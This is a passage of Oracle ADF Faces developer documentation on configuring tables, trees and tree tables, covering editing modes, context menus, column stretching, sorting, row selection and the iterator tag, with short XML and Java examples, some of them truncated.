Not all editable components make sense to be displayed in a click-to-edit mode. For example, those that display multiple lines of HTML input elements may not be good candidates. These components include:

- SelectManyCheckbox
- SelectManyListBox
- SelectOneListBox
- SelectOneRadio
- SelectManyShuttle

Performance Tip: For increased performance during both rendering and postback, you should configure your table to allow editing only in a single row. When you elect to allow only a single row to be edited at a time, the page will be displayed more quickly, as output components tend to generate less HTML than input components. Additionally, client components are not created for the read-only rows. Because the table (or tree, or tree table) performs PPR as the user moves from one row to the next, only that row's data is submitted, resulting in better performance than a table that allows all cells to be edited, which submits all the data for all the rows in the table at the same time. Allowing only a single row to be edited also provides more intuitive validation, because only a single row's data is submitted for validation, and therefore only errors for that row are displayed.
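A minimal sketch of a click-to-edit table as described above; the value bindings and column content are placeholder assumptions, not from the source:

```xml
<!-- editingMode="clickToEdit" renders only the active row with input
     components; all other rows render as read-only output text. -->
<af:table value="#{myBean.model}" var="row" editingMode="clickToEdit">
  <af:column headerText="Name">
    <af:inputText value="#{row.name}"/>
  </af:column>
  <af:column headerText="Hire Date">
    <af:inputDate value="#{row.hireDate}"/>
  </af:column>
</af:table>
```

With editAll instead, every row would render the input components, at the rendering and postback cost noted in the Performance Tip.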
You can configure your table, tree, or tree table so that popup dialogs will be displayed based on a user's actions. For example, you can configure a popup dialog to display some data from the selected row when the user hovers the mouse over a cell or node. You can also create popup context menus for when a user right-clicks a row in a table or tree table, or a node in a tree. Additionally, for tables and tree tables, you can create a context menu for when a user right-clicks anywhere within the table, but not on a specific row.

Tables, trees, and tree tables all contain the contextMenu facet. You place your popup context menu within this facet, and the associated menu will be displayed when the user right-clicks a row. When the context menu is being fetched on the server, the components automatically establish the currency to the row for which the context menu is being displayed. Establishing currency means that the current row in the model for the table now points to the row for which the context menu is being displayed. In order for this to happen, the popup component containing the menu must have its contentDelivery attribute set to lazyUncached so that the menu is fetched every time it is displayed.

Tip: If you want the context menu to dynamically display content based on the selected row, set the popup content delivery to lazyUncached and add a setPropertyListener tag that points to a method on a managed bean that can get the current row and then display data based on the current row (attribute values elided in the source are shown as "..."):

<af:tree ...>
  <f:facet name="contextMenu">
    <af:popup ... contentDelivery="lazyUncached">
      <af:setPropertyListener ... />
      <af:menu>
        <af:menu ...>
          <af:commandMenuItem ... />
          <af:commandMenuItem ... />
          <af:commandMenuItem ... />
        </af:menu>
      </af:menu>
    </af:popup>
  </f:facet>
  ...
</af:tree>

The code on the backing bean might look something like this:

public class DynamicContextMenuTableBean {
    ...

    public void setCurrentTreeRowData(Map currentTreeRowData) {
        _currentTreeRowData = currentTreeRowData;
    }

    public Map getCurrentTreeRowData() {
        return _currentTreeRowData;
    }

    private Map _currentTreeRowData;
}

Tables and tree tables contain the bodyContextMenu facet. You can add a popup that contains a menu to this facet, and it will be displayed whenever a user clicks on the table, but not within a specific row. For more information about creating context menus, see Section 13.2, "Declaratively Creating Popup Elements."

With ADF Faces, the contents of the table, tree, or tree table are rendered on the server. There may be cases when the client needs to access that content on the server, including:

- Client-side application logic may need to read the row-specific component state. For example, in response to row selection changes, the application may want to update the disabled or visible state of other components in the page (usually menu items or toolbar buttons). This logic may be dependent on row-specific metadata sent to the client using a stamped inputHidden component. In order to enable this, the application must be able to retrieve row-specific attribute values from stamped components.
- Client-side application logic may need to modify row-specific component state. For example, clicking a stamped command link in a table row may update the state of other components in the same row.
- The peer may need access to a component instance to implement event handling behavior (for more information about peers, see Section 3.1, "Introduction to Using ADF Faces Architecture"). For example, in order to deliver a client-side action event in response to a mouse click, the AdfDhtmlCommandLinkPeer class needs a reference to the component instance which will serve as the event source. The component also holds on to relevant state, including client listeners as well as attributes that control event delivery behavior, such as disabled or partialSubmit.
Because there is no client-side support for EL in the rich client framework (RCF), nor is there support for sending entire table models to the client, the client-side code cannot rely on component stamping to access the value. Instead of reusing the same component instance on each row, a new JavaScript client component is created on each row (assuming any component must be created at all for any of the rows). Therefore, to access row-specific data on the client, you need to use the stamped component itself to access the value. To do this without a client-side data model, you use a client-side selection change listener. For detailed instructions, see Section 10.10, "Accessing Selected Values on the Client from Components That Use Stamping."

By default, when tables, trees, and tree tables are placed in a component that stretches its children (for example, a panelCollection component inside a panelStretchLayout component), the table, tree, or tree table will stretch to fill the existing space. However, in order for the columns to stretch to fit the table, you must specify a specific column to stretch to fill up any unused space, using the columnStretching attribute. Otherwise, the table will only stretch vertically to fit as many rows as possible. It will not stretch the columns, as shown in Figure 10-7. When placed in a component that does not stretch its children (for example, in a panelCollection component inside a panelGroupLayout component set to vertical), by default, a table width is set to 300px, as shown in Figure 10-8.

When you place a table in a component that does not stretch its children, you can control the height of the table so that it is never more than a specified number of rows, using the autoHeightRows attribute. When you set this attribute to a positive integer, the table height will be determined by the number of rows set. If that number is higher than the fetchSize attribute, then only the number of rows in the fetchSize attribute will be returned.
You can set autoHeightRows to -1 (the default) to turn off auto-sizing. Auto-sizing can be helpful in cases where you want to use the same table both in components that stretch their children and those that do not. For example, say you have a table that has 6 columns and can potentially display 12 rows. When you use it in a component that stretches its children, you want the table to stretch to fill the available space. If you want to use that table in a component that does not stretch its children, you want to be able to "fix" the height of the table. However, if you set a height on the table, then that table will not stretch when placed in the other component. To solve this issue, you can set the autoHeightRows attribute, which will be ignored when the table is in a component that stretches, and will be honored in one that does not.

The table component uses a CollectionModel class. You may also use other model classes, such as java.util.List, array, and javax.faces.model.DataModel. If you use one of these other classes, the table component automatically converts the instance into a CollectionModel class, but without the additional functionality. For more information about the CollectionModel class, see the MyFaces Trinidad Javadoc.

Note: If your application uses the Fusion technology stack, then you can use data controls to create tables and the collection model will be created for you. For more information, see the "Creating ADF Databound Tables" chapter of the Oracle Fusion Middleware Web User Interface Developer's Guide for Oracle Application Development Framework.

The immediate children of a table component must be column components. Each visible column component is displayed as a separate column in the table. Column components contain components used to display content, images, or provide further functionality. For more information about the features available with the column component, see Section 10.2.1, "Columns and Column Data."
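The auto-sizing scenario described above might be configured like this; the value binding and column content are placeholders. The autoHeightRows setting is honored only when the parent does not stretch the table:

```xml
<!-- Caps the table at 12 visible rows when the parent container does
     not stretch its children; ignored when the parent stretches. -->
<af:table value="#{myBean.model}" var="row"
          fetchSize="25" autoHeightRows="12">
  <af:column headerText="Name">
    <af:outputText value="#{row.name}"/>
  </af:column>
</af:table>
```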
Because of this stamping behavior, some components may not work inside the column. Most components will work without problems, for example any input and output components. If you need to use multiple components inside a cell, you can wrap them inside a panelGroupLayout component. Components that themselves support stamping are not supported, such as tables within a table. For information about using components whose values are determined dynamically at runtime, see Section 10.2.9, "What You May Need to Know About Dynamically Determining Values for Selection Components in Tables."

You can use the detailStamp facet in a table to include data that can be optionally displayed or hidden. When you add a component to this facet, the table displays an additional column with an expand and collapse icon for each row. When the user clicks the icon to expand, the component added to the facet is displayed, as shown in Figure 10-9. When the user clicks on the expanded icon to collapse it, the component is hidden, as shown in Figure 10-10. For more information about using the detailStamp facet, see Section 10.3, "Adding Hidden Capabilities to a Table."

Columns contain the components used to display the data. As stated previously, only one child component is needed for each item to be displayed; the values are stamped as the table renders. Columns can be sorted and can also contain a filtering element. Users can enter a value into the filter and the returned data set will match the value entered in the filter. You can set the filter to be either case-sensitive or case-insensitive. If the table is configured to allow it, users can also reorder columns.

Columns have both header and footer facets. The header facet can be used instead of the headerText attribute of the column, allowing you to use a component that can be styled. The footer facet is displayed at the bottom of the column.
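The detailStamp facet described above can be sketched as follows; the value bindings are illustrative placeholders, not from the source:

```xml
<!-- The detailStamp facet adds an expand/collapse column; its content
     is stamped per row and shown only when the row is expanded. -->
<af:table value="#{myBean.model}" var="row">
  <af:column headerText="Order">
    <af:outputText value="#{row.orderId}"/>
  </af:column>
  <f:facet name="detailStamp">
    <af:outputText value="#{row.details}"/>
  </f:facet>
</af:table>
```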
For example, Figure 10-11 uses footer facets to display the total at the bottom of two columns. If the number of rows returned is more than can be displayed, the footer facet is still displayed; the user can scroll to the bottom row.

A table component offers many formatting and visual aids to the user. You can enable these features and specify how they can be displayed. These features include:

- Row selection: By default, at runtime, users cannot select rows. If you want users to be able to select rows in order to perform some action on them somewhere else on the page, or on another page, then enable row selection for the table by setting the rowSelection attribute. You can configure the table to allow either a single row or multiple rows to be selected. For information about how to then programmatically perform some action on the selected rows, see Section 10.2.8, "What You May Need to Know About Performing an Action on Selected Rows in Tables."
- Table height: You can set the table height to be absolute (for example, 300 pixels), or you can determine the height of the table based on the number of rows you wish to display at a time by setting the autoHeightRows attribute. For more information, see Section 10.1.6, "Geometry Management and Table, Tree, and Tree Table Components."
  Note: When a table is placed in a layout-managing container, such as a panelSplitter component, it will be sized by the container and the autoHeightRows attribute is not honored.
- Grid lines: By default, an ADF table component draws both horizontal and vertical grid lines. These may be independently turned off using the horizontalGridVisible and verticalGridVisible attributes.
- Banding: Groups of rows or columns are displayed with alternating background colors using the columnBandingInterval attribute. This helps to differentiate between adjacent groups of rows or columns. By default, banding is turned off.
- Column groups: Columns in a table can be grouped into column groups, by nesting column components.
Each group can have its own column group heading, linking all the columns together.

- Editable cells: When you elect to use input text components to display data in a table, you can configure the table so that all cells can be edited, or so that the user must explicitly click in the cell in order to edit it. For more information, see Section 10.1.3, "Editing Data in Tables, Trees, and Tree Tables."
  Performance Tip: When you choose to have cells be available for editing only when the user clicks on them, the table will initially load faster. This may be desirable if you expect the table to display large amounts of data.
- Column stretching: If the widths of the columns do not together fill the whole table, you can set the columnStretching attribute to determine whether or not to stretch columns to fill up the space, and if so, which columns should stretch. You can set the minimum width for columns, so that when there are many columns in a table and you enable stretching, columns will not be made smaller than the set minimum width. You can also set a width percentage for each column you want to stretch to determine the amount of space that column should take up when stretched.
  Note: If the total sum of the columns' minimum widths equals more than the viewable space in the viewport, the table will expand outside the viewport and a scrollbar will appear to allow access outside the viewport.
  Performance Tip: Column stretching is turned off by default. Turning on this feature may have a performance impact on the client rendering time when used for complex tables (that is, tables with a large amount of data, or with nested columns, and so on).
  Note: Columns configured to be row headers or configured to be frozen will not be stretched, because doing so could easily leave the user unable to access the scrollable body of the table.
- Column selection: You can choose to allow users to be able to select columns of data.
As with row selection, you can configure the table to allow single or multiple column selection. You can also use the columnSelectionListener to respond to the ColumnSelectionEvent that is invoked when a new column is selected by the user. This event reports which columns were just deselected and which columns were just selected.

- Column reordering: Users can reorder the columns at runtime by simply dragging and dropping the column headers. By default, column reordering is allowed, and is handled by a menu item in the panelCollection component. For more information, see Section 10.8, "Displaying Table Menus, Toolbars, and Status Bars."

Each column component also offers many formatting and visual aids to the user. You can enable these features and specify how they can be displayed. These features include:

- Column sorting: Columns can be configured so that the user can sort the contents by a given column, either in ascending or descending order, using the sortable attribute. A special indicator on a column header lets the user know that the column can be sorted. When the user clicks on the icon to sort a previously unsorted column, the column's content is sorted in ascending order. Subsequent clicks on the same header sort the content in the reverse order. In order for the table to be able to sort, the underlying data model must also support sorting. For more information, see Section 10.2.7, "What You May Need to Know About Programmatically Enabling Sorting for Table Columns."
- Content alignment: You can align the content within the column to either the start, end, left, right, or center using the align attribute.
  Tip: Use start and end instead of left and right if your application supports multiple reading directions.
- Column width: The width of a column can be specified as an absolute value in pixels using the width attribute. If you configure a column to allow stretching, then you can also set the width as a percentage.
- Line wrapping: You can define whether or not the content in a column can wrap over lines, using the noWrap attribute. By default, content will not wrap.
- Row headers: You can define the left-most column to be a row header using the rowHeader attribute. When you do so, the left-most column is rendered with the same look as the column headers, and will not scroll off the page. Figure 10-12 shows how a table showing departments appears if the first column is configured to be a row header. If you elect to use a row header column and you configure your table to allow row selection, the row header column displays a selection arrow when a user hovers over the row, as shown in Figure 10-13. For tables that allow multiple selection, users can mouse down and then drag on the row header to select a contiguous block of rows. The table will also autoscroll vertically as the user drags up or down.

Tip: While the user can change the way the table displays at runtime (for example, the user can reorder columns or change column widths), those values will not be retained once the user leaves the page unless you configure your application to allow user customization. For information, see Chapter 31, "Allowing User Customization on JSF Pages."

You use the Create an ADF Faces Table dialog to add a table to a JSF page. You also use this dialog to add column components for each column you need for the table. You can also bind the table to the underlying model or bean using EL expressions.

Note: If your application uses the Fusion technology stack, then you can use data controls to create tables and the binding will be done for you. For more information, see the "Creating ADF Databound Tables" chapter of the Oracle Fusion Middleware Web User Interface Developer's Guide for Oracle Application Development Framework.
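A sketch combining several of the table-level and column-level features listed above; all bindings and attribute values are illustrative placeholders:

```xml
<!-- rowSelection, banding, and grid-line attributes are table-level;
     sortable, align, width, and rowHeader are column-level. -->
<af:table value="#{myBean.model}" var="row"
          rowSelection="multiple"
          columnBandingInterval="1"
          horizontalGridVisible="false">
  <af:column headerText="Department" rowHeader="true"
             sortable="true" sortProperty="deptName"
             align="start" width="120">
    <af:outputText value="#{row.deptName}"/>
  </af:column>
</af:table>
```

The sortProperty value must name a property the underlying model can sort on, as noted above.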
Once you complete the dialog, and the table and columns are added to the page, you can use the Property Inspector to configure additional attributes of the table or columns, and add listeners to respond to table events. You must have an implementation of the CollectionModel class to which your table will be bound.

To display a table on a page:

In the Component Palette, from the Common Components panel, drag and drop a Table to open the Create ADF Faces Table dialog. Use the dialog to bind the table to any existing model you have. When you bind the table to a valid model, the dialog automatically shows the columns that will be created. You can then use the dialog to edit the values for the columns' header and value attributes, and choose the type of component that will be used to display the data. Alternatively, you can manually configure columns and bind at a later date. For more information about using the dialog, press F1 or click Help.

In the Property Inspector, expand the Common section. If you have already bound your table to a model, the value attribute should be set. You can use this section to set the following table-specific attributes:

- RowSelection: Set a value to make the rows selectable. Valid values are: none, single, multiple, and multipleNoSelectAll.
  Note: Users can select all rows and all columns in a table by clicking the column header for the row header if the rowSelection attribute is set to multiple and that table also contains a row header. If you do not want users to be able to select all columns and rows, then set rowSelection to multipleNoSelectAll.
  For information about how to then programmatically perform some action on the selected rows, see Section 10.2.8, "What You May Need to Know About Performing an Action on Selected Rows in Tables."
- ColumnSelection: Set a value to make the columns selectable. Valid values are: none, single, and multiple.

Expand the Columns section.
If you previously bound your table using the Create ADF Faces Table dialog, then these settings should be complete. You can use this section to change the binding for the table, to change the variable name used to access data for each row, and to change the display label and components used for each column.

Tip: If you want to use a component other than those listed, select any component in the Property Inspector, and then manually change it: In the Structure window, right-click the component created by the dialog. Choose Convert from the context menu. Select the desired component from the list. You can then use the Property Inspector to configure the new component.

Tip: If you want more than one component to be displayed in a column, add the other component manually and then wrap them both in a panelGroupLayout component. To do so: In the Structure window, right-click the first component and choose Insert before or Insert after. Select the component to insert. By default, the components will be displayed vertically. To have multiple components displayed next to each other in one column, press the Shift key and select both components in the Structure window. Right-click the selection, choose Surround With, and then select panelGroupLayout.

Expand the Appearance section. You use this section to set the appearance of the table, by setting the following table-specific attributes:

- Width: Specify the width of the table. You can specify the width as either a percentage or as a number of pixels. The default setting is 300 pixels. If you configure the table to stretch columns (using the columnStretching attribute), you must set the width to percentages.
  Tip: If the table is a child to a component that stretches its children, then this width setting will be overridden and the table will automatically stretch to fit its container. For more information about how components stretch, see Section 8.2.1, "Geometry Management and Component Stretching."
- ColumnStretching: If the widths of the columns do not together fill the whole table, you can set this attribute to determine whether or not to stretch columns to fill up the space, and if so, which columns should stretch.
  Note: If the table is placed inside a component that can stretch its children, only the table will stretch automatically. You must manually configure column stretching if you want the columns to stretch to fill the table.
  Note: Columns configured to be row headers or configured to be frozen will not be stretched, because doing so could easily leave the user unable to access the scrollable body of the table.
  Performance Tip: Column stretching is turned off by default. Turning on this feature may have a performance impact on the client rendering time for complex tables.
  You can set column stretching to one of the following values:
  - blank: If you want to have an empty blank column automatically inserted and have it stretch (so the row background colors will span the entire width of the table).
  - A specifically named column: Any column currently in the table can be selected to be the column to stretch.
  - last: If you want the last column to stretch to fill up any unused space inside of the window.
  - none: The default option, where nothing will be stretched. Use this for optimal performance.
  - multiple: All columns that have a percentage value set for their width attribute will be stretched to that percent, once other columns have been rendered to their (non-stretched) width. The percentage values will be weighted against the total. For example, if you set the width attribute on three columns to 50%, each column will get 1/3 of the remaining space after all other columns have been rendered.
  Tip: While the user can change the values of the column width at runtime, those values will not be retained once the user leaves the page unless you configure your application to use change persistence.
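The weighting rule for the multiple stretching value can be checked with a little arithmetic. The helper below is illustrative only, not ADF code; it just demonstrates that each stretched column receives its percentage divided by the sum of all stretched columns' percentages:

```java
// Illustrative arithmetic for columnStretching="multiple":
// each stretched column's share of the leftover space is its
// widthPercent divided by the sum of all stretched widthPercents.
public class StretchMath {
    public static double shareOf(double columnPercent, double[] allPercents) {
        double total = 0;
        for (double p : allPercents) total += p;
        return columnPercent / total;
    }

    public static void main(String[] args) {
        // Three columns each set to 50% split the remaining space
        // evenly: 50 / (50 + 50 + 50) = one third each.
        double[] cols = {50, 50, 50};
        System.out.println(shareOf(50, cols));
    }
}
```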
For information about enabling and using change persistence, see Chapter 31, "Allowing User Customization on JSF Pages."

- HorizontalGridVisible: Specify whether or not the horizontal grid lines are to be drawn.
- VerticalGridVisible: Specify whether or not the vertical grid lines are to be drawn.
- RowBandingInterval: Specify how many consecutive rows form a row group for the purposes of color banding. By default, this is set to 0, which displays all rows with the same background color. Set this to 1 if you want to alternate colors.
- ColumnBandingInterval: Specify the interval between which the column banding occurs. This value controls the display of the column banding in the table. For example, columnBandingInterval=1 would display alternately banded columns in the table.
- FilterVisible: You can add a filter to the table so that it displays only those rows that match the entered filter criteria. If you configure the table to allow filtering, you can set the filter to be case-insensitive or case-sensitive. For more information, see Section 10.4, "Enabling Filtering in Tables."
- Text attributes: You can define text strings that will determine the text displayed when no rows can be displayed, as well as a table summary and description for accessibility purposes.

Expand the Behavior section. You use this section to configure the behavior of the table by setting the following table-specific attributes:

- DisableColumnReordering: By default, columns can be reordered at runtime using a menu option contained by default in the panelCollection component. You can change this so that users will not be able to change the order of columns. (The panelCollection component provides default menus and toolbar buttons for tables, trees, and tree tables. For more information, see Section 10.8, "Displaying Table Menus, Toolbars, and Status Bars.")
Note: While the user can change the order of columns, those values will not be retained once the user leaves the page unless you configure your application to allow user customization. For information, see Chapter 31, "Allowing User Customization on JSF Pages."

- FetchSize: Set the size of the block that should be returned with each data fetch. The default is 25.
  Tip: You should determine the value of the fetchSize attribute by taking the height of the table and dividing it by the height of each row to determine how many rows will be needed to fill the table. If the fetchSize attribute is set too low, it will require multiple trips to the server to fill the table. If it is set too high, the server will need to fetch more rows from the data source than needed, thereby increasing time and memory usage. On the client side, it will take longer to process those rows and attach them to the component. For more information, see Section 10.1.1, "Content Delivery."
- AutoHeightRows: If you want your table to size the height automatically to fill up available space, specify the maximum number of rows that the table should display. The default value is -1 (no automatic sizing for any number of rows). You can also set the value to 0 to have the value be the same as the fetchSize. For more information, see Section 8.2.1, "Geometry Management and Component Stretching."
- DisplayRow: Specify the row to be displayed in the table during the initial display. The possible values are first to display the first row at the top of the table, last to display the last row at the bottom of the table (users will need to scroll up to view preceding rows), and selected to display the first selected row in the table.
  Note: The total number of rows from the table model must be known in order for this attribute to work successfully.
- DisplayRowKey: Specify the row key to display in the table during initial display. This attribute should be set programmatically rather than declaratively because the values may not be strings.
Specifying this attribute will override the displayRow attribute.
  Note: The total number of rows must be known from the table model in order for this attribute to work successfully.
- EditingMode: Specify whether, for any editable components, you want all the rows to be editable (editAll), or you want the user to click a row to make it editable (clickToEdit). For more information, see Section 10.1.3, "Editing Data in Tables, Trees, and Tree Tables."
  Tip: If you choose clickToEdit, then only the active row can be edited. This row is determined by the activeRowKey attribute. By default, when the table is first rendered, the active row is the first visible row. When a user clicks another row, then that row becomes the active row. You can change this behavior by setting a different value for the activeRowKey attribute, located in the Other section.
- ContextMenuSelect: Specify whether or not the row is selected when you right-click to open a context menu. When set to true, the row is selected. For more information about context menus, see Chapter 13, "Using Popup Dialogs, Menus, and Windows."
- FilterModel: Use in conjunction with filterVisible. For more information, see Section 10.4, "Enabling Filtering in Tables."
- Various listeners: Bind listeners to methods that will execute when the table invokes the corresponding event (the columnSelectionListener is located in the Other section). For more information, see Chapter 5, "Handling Events."

Expand the Other section, and set the following:

- ActiveRowKey: If you choose clickToEdit, then only the active row can be edited. This row is determined by the activeRowKey attribute. By default, when the table is first rendered, the active row is the first visible row. When a user clicks another row, then that row becomes the active row. You can change this behavior by setting a different value for the activeRowKey attribute.
- ColumnResizing: Specify whether or not you want the end user to be able to resize a column's width at runtime.
When set to disabled, the widths of the columns will be set once the page is rendered, and the user will not be able to change those widths.
Tip: While the user can change the values of the column width at runtime, those width values will not be retained once the user leaves the page unless you configure your application to use change persistence. For information about enabling and using change persistence, see Chapter 31, "Allowing User Customization on JSF Pages."
In the Structure window, select a column. In the Property Inspector, expand the Common section, and set the following column-specific attributes:
HeaderText: Specify text to be displayed in the header of the column. This is a convenience that generates output equivalent to adding a header facet containing an outputText component. If you want to use a component other than outputText, you should use the column's header facet instead (for more information, see Step 12). When the header facet is added, any value for the headerText attribute will not be rendered in a column header.
Align: Specify the alignment for this column. start, end, and center are used for left-justified, right-justified, and center-justified respectively in left-to-right display. The values left or right can be used when left-justified or right-justified cells are needed, irrespective of the left-to-right or right-to-left display. The default value is null, which implies that it is skin-dependent and may vary for the row header column versus the data in the column. For more information about skins, see Chapter 20, "Customizing the Appearance Using Styles and Skins."
Sortable: Specify whether or not the column can be sorted. A column that can be sorted has a header that, when clicked, sorts the table by that column's property. Note that in order for a column to be sortable, the sortable attribute must be set to true and the underlying model must support sorting by this column's property.
For more information, see Section 10.2.7, "What You May Need to Know About Programmatically Enabling Sorting for Table Columns."
Note: When column selection is enabled, clicking on a column header selects the column instead of sorting the column. In this case, columns can be sorted by clicking the ascending/descending sort indicator.
Filterable: Specify whether or not the column can be filtered. A column that can be filtered has a filter field on the top of the column header. Note that in order for a column to be filterable, this attribute must be set to true and the filterModel attribute must be set on the table. Only leaf columns can be filtered, and the filter component is displayed only if the column header is present. This column's sortProperty attribute must be used as a key for the filterProperty attribute in the filterModel class.
Note: For a column with filtering turned on (filterable = true), you can specify the input component to be used as the filter criteria input field. To do so, add a filter facet to the column and add the input component. For more information, see Section 10.4, "Enabling Filtering in Tables."
Expand the Appearance section. Use this section to set the appearance of the column, using the following column-specific attributes:
DisplayIndex: Specify the display order index of the column. Columns can be rearranged and they are displayed in the table based on the displayIndex attribute. Columns without a displayIndex attribute value are displayed at the end, in the order in which they appear in the data source. The displayIndex attribute is honored only for top-level columns, because it is not possible to rearrange a child column outside of the parent column.
Width: Specify the width of the column.
MinimumWidth: Specify the minimum number of pixels for the column width. When a user attempts to resize the column, this minimum width will be enforced.
Also, when a column is flexible, it will never be stretched to be a size smaller than this minimum width. If a pixel width is defined and if the minimum width is larger, the minimum width will become the smaller of the two values. By default, the minimum width is 10 pixels.
ShowRequired: Specify whether or not an asterisk should be displayed in the column header if data is required for the corresponding attribute.
HeaderNoWrap and NoWrap: Specify whether or not you want content to wrap in the header and in the column.
RowHeader: Set to true if you want this column to be a row header for the table.
Expand the Behavior section. Use this section to configure the behavior of the columns, using the following column-specific attributes:
SortProperty: Specify the property that is to be displayed by this column. This is the property that the framework might use to sort the column's data.
Frozen: Specify whether the column is frozen; that is, it cannot be scrolled off the page. In the table, columns up to the frozen column are locked with the header, and not scrolled with the rest of the columns. The frozen attribute is honored only on the top-level column, because it is not possible to freeze a child column by itself without its parent being frozen.
Selected: When set to true, the column will be selected on initial rendering.
To add a column to an existing table, in the Structure window, right-click the table and from the context menu choose Insert Inside Table > Column. To add facets to the table, right-click the table and from the context menu, choose Facets - Table. To add facets to a column, right-click the column and from the context menu, choose Facets - Column.
Add components as children to the columns to display your data. The component's value should be bound to the variable value set on the table's var attribute and the attribute to be displayed.
For example, the table in the File Explorer application uses file as the value for the var attribute, and the first column displays the name of the file for each row. Therefore, the value of the output component used to display the directory name is #{file.name}.
Tip: If an input component is the direct child of a column, be sure its width is set to a width that is appropriate for the width of the column. If the width is set too large for its parent column, the browser may extend its text input cursor too wide and cover adjacent columns. For example, if an inputText component has its size set to 80 pixels and its parent column size is set to 20 pixels, the table may have an input cursor that covers the clickable areas of its neighbor columns. To allow the input component to be automatically sized when it is not the direct child of a column, set contentStyle="width:auto".
When you use JDeveloper to add a table onto a page, JDeveloper creates a table with a column for each attribute. If you bind the table to a model, the columns will reflect the attributes in the model. If you are not yet binding to a model, JDeveloper will create the columns using the default values. You can change the default values (add/delete columns, change column headings, and so on) in the table creation dialog or later using the Property Inspector.
Example 10-2 shows abbreviated page code for the table in the File Explorer application (attribute values are omitted in this excerpt).
Example 10-2 ADF Faces Table in the File Explorer Application
<af:table ...>
  <af:column ...>
    <f:facet ...>
      <af:outputText ...>
    </f:facet>
    <af:panelGroupLayout>
      <af:image ...>
      <af:outputText ...>
    </af:panelGroupLayout>
  </af:column>
  <af:column ...>
    <f:facet ...>
      <af:outputText ...>
    </f:facet>
    <af:outputText ...>
  </af:column>
  ...
  <af:column ...>
    <f:facet ...>
      <af:outputText ...>
    </f:facet>
    <af:commandLink ...></af:commandLink>
  </af:column>
</af:table>
When a page is requested that contains a table, and the content delivery is set to lazy, the page initially goes through the standard lifecycle.
However, instead of fetching the data during that request, a special separate PPR request is run. Because the page has just rendered, only the Render Response phase executes, and the corresponding data is fetched and displayed. If the user's actions cause a subsequent data fetch (for example, scrolling in a table), another PPR request is executed. Figure 10-14 shows a page containing a table during the second PPR request.
When the user clicks a sortable column header, the table component generates a SortEvent event. This event has a getSortCriteria property, which returns the criteria by which the table must be sorted. The table responds to this event by calling the setSortCriteria() method on the underlying CollectionModel instance, and calls any registered SortListener instances.
Sorting can be enabled for a table column only if the underlying model supports sorting. If the model is a CollectionModel instance, it must implement the following methods:
public boolean isSortable(String propertyName)
public List getSortCriteria()
public void setSortCriteria(List criteria)
For more information, see the MyFaces Trinidad Javadoc.
If the underlying model is not a CollectionModel instance, the table component automatically examines the actual data to determine which properties can be sorted. Any column that has data that implements the java.lang.Comparable class is able to be sorted. Although this automatic support is not as efficient as coding sorting directly into a CollectionModel (for instance, by translating the sort into an ORDER BY SQL clause), it may be sufficient for small data sets.
Note: Automatic support provides sorting for only one column. Multi-column sorting is not supported.
A table can allow users to select one or more rows and perform some actions on those rows. When the selection state of a table changes, the table triggers selection events. A selectionEvent event reports which rows were just deselected and which rows were just selected.
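The Comparable-based automatic sorting described above can be illustrated with a small plain-Java sketch. This is not the ADF Faces or Trinidad API; the RowSorter class and sortBy method below are hypothetical names used only to show how a column whose values implement java.lang.Comparable can back a sortable column.

```java
import java.util.ArrayList;
import java.util.Comparator;
import java.util.List;
import java.util.function.Function;

// Hypothetical sketch: what a table effectively does for small data sets
// when sorting by a property whose values implement java.lang.Comparable.
class RowSorter {
    // Sorts rows by the Comparable value extracted by 'property',
    // ascending or descending -- analogous to clicking a column header.
    static <T, V extends Comparable<V>> List<T> sortBy(
            List<T> rows, Function<T, V> property, boolean ascending) {
        List<T> copy = new ArrayList<>(rows);       // leave the model untouched
        Comparator<T> c = Comparator.comparing(property);
        copy.sort(ascending ? c : c.reversed());
        return copy;
    }
}
```

A real CollectionModel implementation would instead translate the sort criteria into something efficient, such as an ORDER BY clause, as the text notes.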
To listen for selection events on a table, you can register a listener on the table either using the selectionListener attribute or by adding a listener to the table using the addSelectionListener() method. The listener can then access the selected rows and perform some actions on them.
The current selection, that is, the selected row or rows, is the RowKeySet object, which you obtain by calling the getSelectedRowKeys() method for the table. To change a selection programmatically, you can do either of the following:
Add rowKey objects to, or remove rowKey objects from, the RowKeySet object.
Make a particular row current by calling the setRowIndex() or the setRowKey() method on the table. You can then either add that row to the selection, or remove it from the selection, by calling the add() or remove() method on the RowKeySet object.
Example 10-3 shows a portion of a table in which a user can select some rows then click the Delete button to delete those rows. Note that the action listener is bound to the performDelete method on the mybean managed bean.
Example 10-3 Selecting Rows
<af:table
Example 10-4 shows an action method, performDelete, which iterates through all the selected rows and calls the markForDeletion method on each one.
Example 10-4 Using the rowKey Object
public void performDelete(ActionEvent action)
{
  UIXTable table = getTable();
  Iterator selection = table.getSelectedRowKeys().iterator();
  Object oldKey = table.getRowKey();
  while (selection.hasNext())
  {
    Object rowKey = selection.next();
    table.setRowKey(rowKey);
    MyRowImpl row = (MyRowImpl) table.getRowData();
    // custom method exposed on an implementation of Row interface.
    row.markForDeletion();
  }
  // restore the old key:
  table.setRowKey(oldKey);
}

// Binding methods for access to the table.
public void setTable(UIXTable table)
{
  _table = table;
}

public UIXTable getTable()
{
  return _table;
}

private UIXTable _table;
There may be a case when you want to use a selectOne component in a table, but you need each row to display different choices in a component. Therefore, you need to dynamically determine the list of items at runtime.
While you may think you should use a forEach component to stamp out the individual items, this will not work because forEach does not work with the CollectionModel instance. It also cannot be bound to EL expressions that use component-managed EL variables, such as those used in the table. The forEach component performs its functions in the JSF tag execution step while the table performs in the following component encoding step. Therefore, the forEach component will execute before the table is ready and will not perform its iteration function.
In the case of a selectOne component, the direct child must be the items component. While you could bind the items component directly to the row variable (for example, <f:items, doing so would not allow any changes to the underlying model. Instead, you should create a managed bean that creates a list of items, as shown in Example 10-5.
Example 10-5 Managed Bean Returns a List of Items
public List<SelectItem> getItems()
{
  // Grab the list of items
  FacesContext context = FacesContext.getCurrentInstance();
  Object rowItemObj = context.getApplication().evaluateExpressionGet(
      context, "#{row.items}", Object.class);
  if (rowItemObj == null)
    return null;
  // Convert the model objects into items
  List<SomeModelObject> list = (List<SomeModelObject>) rowItemObj;
  List<SelectItem> items = new ArrayList<SelectItem>(list.size());
  for (SomeModelObject entry : list)
  {
    items.add(new SelectItem(entry.getValue(), entry.getLabel()));
  }
  // Return the items
  return items;
}
You can then access the list from the selectOne component on the page, as shown in Example 10-6.
When you do not want to use a table, but still need the same stamping capabilities, you can use the iterator tag. For example, say you want to display a list of periodic table elements, and for each element, you want to display the name, atomic number, symbol, and group. You can use the iterator tag as shown in Example 10-7.
Example 10-7 Using the Iterator Tag
<af:iterator ...>
  <af:outputText ...>
  <af:inputText ...>
